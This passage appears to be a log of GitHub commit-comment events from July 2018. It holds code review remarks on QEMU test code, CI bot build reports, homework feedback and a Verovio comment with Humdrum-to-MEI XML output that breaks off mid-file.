{"id":"7917615380","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"Jan-E/v8js"},"payload":{"comment":{"id":29593108,"position":5,"line":214,"path":"v8js_v8object_class.cc","commit_id":"0a12ac19d8afa13a435d23be05fa15b2931be67d","created_at":"2018-07-04T10:25:08Z","updated_at":"2018-07-04T10:25:08Z","author_association":"NONE","body":"Ah, you're right!"}},"created_at":"2018-07-04T10:25:08Z"}
{"id":"7917615749","type":"CommitCommentEvent","actor":{"login":"marvin098"},"repo":{"name":"lxkn/RateUsersSkills"},"payload":{"comment":{"id":29593110,"position":31,"line":31,"path":"public/controllers/registerController.js","commit_id":"8ee84fbd4802c7a2f9f5394596931be95c112b52","created_at":"2018-07-04T10:25:12Z","updated_at":"2018-07-04T10:25:12Z","author_association":"NONE","body":"Email is not equals to confirm email. ??\r\nGoogle translator -> \r\n> E-mail nie jest równoznaczny z potwierdzeniem wiadomości e-mail. ??"}},"created_at":"2018-07-04T10:25:12Z"}
{"id":"7917630699","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593141,"position":71,"line":71,"path":"tests/qgraph/x86_64_pc-machine.c","commit_id":"fe518fb2c2702f1031c01da252e122d15eeda65e","created_at":"2018-07-04T10:28:24Z","updated_at":"2018-07-04T10:28:24Z","author_association":"NONE","body":"Also, this line should be in the qsdhci commit.\r\n\r\nRelated to this, I wonder if we should name the function `qos_node_consumes`, even though the arguments are reversed compared to the direction of the edge. That's because the argument order becomes more consistent:\r\n\r\n    qos_node_create_interface(\"sdhci\");\r\n    qos_node_create_driver(\"generic-sdhci\", NULL);\r\n    qos_node_produces(\"generic-sdhci\", \"sdhci\");\r\n    qos_node_create_driver(\"sdhci-pci\", sdhci_pci_create);\r\n    qos_node_consumes(\"sdhci-pci\", \"pci-bus\");\r\n    qos_node_produces(\"sdhci-pci\", \"sdhci\");\r\n"}},"created_at":"2018-07-04T10:28:24Z"}
{"id":"7917634770","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593146,"position":1,"line":1,"path":"tests/qgraph/libqgraph-main.c","commit_id":"8f2f514071ee1e94c65d7cb536f89730f2b23bf0","created_at":"2018-07-04T10:29:16Z","updated_at":"2018-07-04T10:29:16Z","author_association":"NONE","body":"Please move this to tests/qos-test.c."}},"created_at":"2018-07-04T10:29:16Z"}
{"id":"7917637548","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29593153,"position":null,"line":null,"path":null,"commit_id":"506855ceaba9998b58e453321226b4ae1320cd5d","created_at":"2018-07-04T10:29:49Z","updated_at":"2018-07-04T10:29:49Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1682 of 1682 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.16%25-green.png)</a>\n"}},"created_at":"2018-07-04T10:29:49Z"}
{"id":"7917640884","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593159,"position":6,"line":770,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T10:30:29Z","updated_at":"2018-07-04T10:30:29Z","author_association":"NONE","body":"This should be `check-unit-y`, i.e. part of the tests that don't need QEMU to be compiled. Also, please move it to `tests/test/qgraph.c`."}},"created_at":"2018-07-04T10:30:29Z"}
{"id":"7917642817","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593162,"position":71,"line":71,"path":"tests/qgraph/x86_64_pc-machine.c","commit_id":"fe518fb2c2702f1031c01da252e122d15eeda65e","created_at":"2018-07-04T10:30:53Z","updated_at":"2018-07-04T10:30:53Z","author_association":"OWNER","body":"as you like, I decided to use `consumed_by` because it follows the logic of the path, otherwise you have an inverse edge (as you said)  "}},"created_at":"2018-07-04T10:30:53Z"}
{"id":"7917643393","type":"CommitCommentEvent","actor":{"login":"dbradul"},"repo":{"name":"ismelyanets/python_hw"},"payload":{"comment":{"id":29593163,"position":5,"line":5,"path":"hw_34.py","commit_id":"3f25b4c8dbdcf820bf9f71d559f9fed5c1abdc36","created_at":"2018-07-04T10:30:59Z","updated_at":"2018-07-04T10:30:59Z","author_association":"NONE","body":"По заданию \"_при создании Годзиллы указывается объем желудка_\", т.е. у каждого экземпляра свой объем, который задается в `__init__`"}},"created_at":"2018-07-04T10:30:59Z"}
{"id":"7917648319","type":"CommitCommentEvent","actor":{"login":"dbradul"},"repo":{"name":"ismelyanets/python_hw"},"payload":{"comment":{"id":29593176,"position":8,"line":8,"path":"hw_34.py","commit_id":"3f25b4c8dbdcf820bf9f71d559f9fed5c1abdc36","created_at":"2018-07-04T10:31:59Z","updated_at":"2018-07-04T10:31:59Z","author_association":"NONE","body":"По заданию в метод `eat` \"_должен передаваться объем съеденного человека_\", а не генерироваться внутри."}},"created_at":"2018-07-04T10:31:59Z"}
{"id":"7917652312","type":"CommitCommentEvent","actor":{"login":"simon-frank"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29593191,"position":null,"line":null,"path":null,"commit_id":"4a982eef101d863fb2723b22ac11481c9ef67797","created_at":"2018-07-04T10:32:48Z","updated_at":"2018-07-04T10:32:48Z","author_association":"COLLABORATOR","body":"Endlich der erste Release \r\nTop Papa"}},"created_at":"2018-07-04T10:32:48Z"}
{"id":"7917654701","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593198,"position":30,"line":30,"path":"tests/qgraph/raspi2-machine.c","commit_id":"c9cbe1c4cd7aaf6bb86845536a20b3d775b3b2f2","created_at":"2018-07-04T10:33:19Z","updated_at":"2018-07-04T10:33:19Z","author_association":"NONE","body":"s/common/sdhci_props/ or, even better, use a compound literal in qos_create_sdhci_mm:\r\n\r\n    qos_create_sdhci_mm(&machine->sdhci, 0x3f300000, &(QSDHCIProperties) {\r\n        .version = 3,\r\n        .baseclock = 52,\r\n        .capab.sdma = false,\r\n        .capab.reg = 0x052134b4\r\n    });"}},"created_at":"2018-07-04T10:33:19Z"}
{"id":"7917657745","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29593206,"position":null,"line":null,"path":null,"commit_id":"f00d94abad47c19f0f0a00d5fd9c537ef46d57a8","created_at":"2018-07-04T10:33:57Z","updated_at":"2018-07-04T10:33:57Z","author_association":"COLLABORATOR","body":"Puzzle `939-6bf607a5` disappeared from [`src/main/java/com/zerocracy/radars/viber/VbEvent.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/radars/viber/VbEvent.java), that's why I closed #1072. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-04T10:33:57Z"}
{"id":"7917659728","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593213,"position":null,"line":null,"path":null,"commit_id":"9e107f7df40ad81f4dca82bcc3d1ae7c1a1d294b","created_at":"2018-07-04T10:34:23Z","updated_at":"2018-07-04T10:34:23Z","author_association":"NONE","body":"No comments here, but there are comments on other commits, about work that has to be done on this one."}},"created_at":"2018-07-04T10:34:23Z"}
{"id":"7917665798","type":"CommitCommentEvent","actor":{"login":"pfent"},"repo":{"name":"TCA-Team/TumCampusApp"},"payload":{"comment":{"id":29593223,"position":5,"line":70,"path":"app/src/main/java/de/tum/in/tumcampusapp/database/TcaDb.java","commit_id":"c77ca823e31539025d13220bbc72ce78c2403d91","created_at":"2018-07-04T10:35:27Z","updated_at":"2018-07-04T10:35:27Z","author_association":"CONTRIBUTOR","body":":man_facepalming: "}},"created_at":"2018-07-04T10:35:27Z"}
{"id":"7917671437","type":"CommitCommentEvent","actor":{"login":"edmondscommerce"},"repo":{"name":"phpstan/phpstan-shim"},"payload":{"comment":{"id":29593233,"position":null,"line":null,"path":null,"commit_id":"0db0041624bd0ccbcf944be6a86880e8663fc3e2","created_at":"2018-07-04T10:36:33Z","updated_at":"2018-07-04T10:36:33Z","author_association":"NONE","body":"OK thanks, confirmed this is fixed in dev-master\r\n\r\nAny chance of a stable release?"}},"created_at":"2018-07-04T10:36:33Z"}
{"id":"7917675242","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29593239,"position":null,"line":null,"path":null,"commit_id":"f4633bc43033157a1ba0d71b0a794140331b58d6","created_at":"2018-07-04T10:37:23Z","updated_at":"2018-07-04T10:37:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [009 - Desenvolver Classe EstadoService](https://trello.com/c/FGOgTZ1G/19-009-desenvolver-classe-estadoservice)"}},"created_at":"2018-07-04T10:37:23Z"}
{"id":"7917675846","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29593240,"position":null,"line":null,"path":null,"commit_id":"bb79d0599ae1abd9a42ede2e237ab216439cc015","created_at":"2018-07-04T10:37:31Z","updated_at":"2018-07-04T10:37:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [009 - Desenvolver Classe EstadoService](https://trello.com/c/FGOgTZ1G/19-009-desenvolver-classe-estadoservice)"}},"created_at":"2018-07-04T10:37:31Z"}
{"id":"7917676851","type":"CommitCommentEvent","actor":{"login":"ahmad-moussawi"},"repo":{"name":"sqlkata/querybuilder"},"payload":{"comment":{"id":29593243,"position":null,"line":null,"path":null,"commit_id":"2cd0e0efd2514aa019603f8de006b388721f8227","created_at":"2018-07-04T10:37:42Z","updated_at":"2018-07-04T10:37:42Z","author_association":"CONTRIBUTOR","body":"@ceastwood isn't `netstandard1.0` means the support for netfx45 and netcoreapp1.0 ?"}},"created_at":"2018-07-04T10:37:42Z"}
{"id":"7917681005","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29593247,"position":null,"line":null,"path":null,"commit_id":"506855ceaba9998b58e453321226b4ae1320cd5d","created_at":"2018-07-04T10:38:36Z","updated_at":"2018-07-04T10:38:36Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - Win64-Windows-7-VisualStudio-14: OK (2806 of 2930 tests passed, 42 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 123 tests had: Table big diffs.\n * 112 tests had: ESO small diffs.\n * 96 tests had: EIO diffs.\n * 99 tests had: MTR small diffs.\n * 2 tests had: ESO big diffs.\n * 6 tests had: ERR diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 499\n * Failed: 124\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.77%25-yellow.png)</a> \n"}},"created_at":"2018-07-04T10:38:36Z"}
{"id":"7917694797","type":"CommitCommentEvent","actor":{"login":"nitaking"},"repo":{"name":"react-navigation/react-navigation"},"payload":{"comment":{"id":29593267,"position":null,"line":null,"path":null,"commit_id":"bc01a4cd5701fd6f73861c14a578131950061f28","created_at":"2018-07-04T10:41:30Z","updated_at":"2018-07-04T10:41:30Z","author_association":"NONE","body":"@brentvatne \r\nWhy did you commit this?\r\nMy header used `<Image />` and I was surprised to get an error.\r\n\r\nIs it useless unless it is a string?"}},"created_at":"2018-07-04T10:41:30Z"}
{"id":"7917695971","type":"CommitCommentEvent","actor":{"login":"Bunty77"},"repo":{"name":"Bunty77/CRM_Automation"},"payload":{"comment":{"id":29593274,"position":10,"line":10,"path":"src/main/java/com/crm/qa/base/search.java","commit_id":"54ebfb60687cee6fbf42ed7068aa410c1c471d7b","created_at":"2018-07-04T10:41:46Z","updated_at":"2018-07-04T10:41:46Z","author_association":"OWNER","body":"good code writing "}},"created_at":"2018-07-04T10:41:46Z"}
{"id":"7917700936","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29593287,"position":null,"line":null,"path":null,"commit_id":"2446384d762563d50b432455d07829d37d805dd3","created_at":"2018-07-04T10:42:46Z","updated_at":"2018-07-04T10:42:46Z","author_association":"NONE","body":"For beginner, esp tool chain update break my build. So my first move is to check your commit history if you get it fix. For now, it is still OK to browse it from commit history or do a git blame. But in the long run, we have better split it out. That's my 2 cents. "}},"created_at":"2018-07-04T10:42:46Z"}
{"id":"7917703466","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29593289,"position":null,"line":null,"path":null,"commit_id":"308ce8f6d7a20b2672da825f540d955d19f563f4","created_at":"2018-07-04T10:43:18Z","updated_at":"2018-07-04T10:43:18Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-04T10:43:18Z"}
{"id":"7917707103","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29593305,"position":null,"line":null,"path":null,"commit_id":"ef685d059effd24a5459d987ded884334dd96713","created_at":"2018-07-04T10:44:05Z","updated_at":"2018-07-04T10:44:05Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 678](https://travis-ci.org/per1234/arduino-ci-script/builds/399942834) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00678-001-tsv"}},"created_at":"2018-07-04T10:44:05Z"}
{"id":"7917707706","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29593309,"position":null,"line":null,"path":null,"commit_id":"ef685d059effd24a5459d987ded884334dd96713","created_at":"2018-07-04T10:44:12Z","updated_at":"2018-07-04T10:44:12Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 678](https://travis-ci.org/per1234/arduino-ci-script/builds/399942834) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00678"}},"created_at":"2018-07-04T10:44:12Z"}
{"id":"7917708313","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29593312,"position":null,"line":null,"path":null,"commit_id":"b3eaed9a911cacc7f763606d825998a9f59e81b1","created_at":"2018-07-04T10:44:20Z","updated_at":"2018-07-04T10:44:20Z","author_association":"CONTRIBUTOR","body":"This commit adds `chord@breaksec` in the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n<img width=\"1187\" alt=\"screen shot 2018-07-04 at 12 40 55 pm\" src=\"https://user-images.githubusercontent.com/3487289/42272851-bd9408dc-7f87-11e8-923f-e4e762db790f.png\">\r\n\r\n```\r\n**kern\r\n*M3/8\r\n=1\r\n16b 16g 16eLL\r\n16b 16g 16e\r\n16b 16g 16e\r\n16b 16g 16e\r\n16b 16g 16e\r\n16b 16g 16eJJ\r\n=2\r\n16b 16g 16eLL\r\n16b 16g 16e\r\n16b 16g 16eJ\r\n16b 16g 16eL\r\n16b 16g 16e\r\n16b 16g 16eJJ\r\n=3\r\n16b 16g 16eLL\r\n16b 16g 16eJ\r\n16b 16g 16eL\r\n16b 16g 16eJ\r\n16b 16g 16eL\r\n16b 16g 16eJJ\r\n=4\r\n32cc 32a 32fLLL\r\n32cc 32a 32f\r\n32cc 32a 32fJ\r\n32cc 32a 32fL\r\n32cc 32a 32f\r\n32cc 32a 32fJJJ\r\n32cc 32a 32fLLL\r\n32cc 32a 32f\r\n32cc 32a 32fJJ\r\n32cc 32a 32fLL\r\n32cc 32a 32f\r\n32cc 32a 32fJJJ\r\n==\r\n*-\r\n!!!RDF**kern: < = below\r\n```\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-04T12:43:47\" version=\"2.0.0-dev-f0e1012\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n        <extMeta>\r\n            <frames xmlns:humxml=\"http://www.humdrum.org/ns/humxml\">\r\n                <metaFrame n=\"38\" token=\"!!!RDF**kern: &lt; = below\" xml:id=\"loc38\">\r\n                    <frameInfo>\r\n                        <startTime float=\"6\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>&lt; = below</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n            </frames>\r\n        </extMeta>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000985180131\">\r\n                <score xml:id=\"score-0000000823543347\">\r\n                    <scoreDef xml:id=\"scoredef-0000002080716897\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001433990636\">\r\n                            <staffDef xml:id=\"staffdef-0000000653694113\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"3\" meter.unit=\"8\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001493807608\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L3\" n=\"1\">\r\n                            <staff xml:id=\"staff-L3F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L3F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L4F1-L9F1\">\r\n                                        <chord xml:id=\"chord-L4F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L4F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L4F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L4F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L5F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L5F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L5F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L5F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L6F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L6F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L6F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L6F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L7F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L7F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L7F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L7F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L8F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L8F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L8F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L8F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L9F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L9F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L9F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L9F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L10\" n=\"2\">\r\n                            <staff xml:id=\"staff-L10F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L10F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L11F1-L16F1\">\r\n                                        <chord xml:id=\"chord-L11F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L11F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L11F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L11F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L12F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L12F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L12F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L12F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L13F1\" breaksec=\"1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L13F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L13F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L13F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L14F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L14F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L14F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L14F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L15F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L15F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L15F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L15F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L16F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L16F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L16F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L16F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L17\" n=\"3\">\r\n                            <staff xml:id=\"staff-L17F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L17F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L18F1-L23F1\">\r\n                                        <chord xml:id=\"chord-L18F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L18F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L18F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L18F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L19F1\" breaksec=\"1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L19F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L19F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L19F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L20F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L20F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L20F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L20F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L21F1\" breaksec=\"1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L21F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L21F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L21F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L22F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L22F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L22F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L22F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L23F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L23F1S1\" oct=\"4\" pname=\"b\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L23F1S2\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L23F1S3\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L24\" right=\"end\" n=\"4\">\r\n                            <staff xml:id=\"staff-L24F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L24F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L25F1-L30F1\">\r\n                                        <chord xml:id=\"chord-L25F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L25F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L25F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L25F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L26F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L26F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L26F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L26F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L27F1\" breaksec=\"2\" dur=\"32\">\r\n                                            <note xml:id=\"note-L27F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note 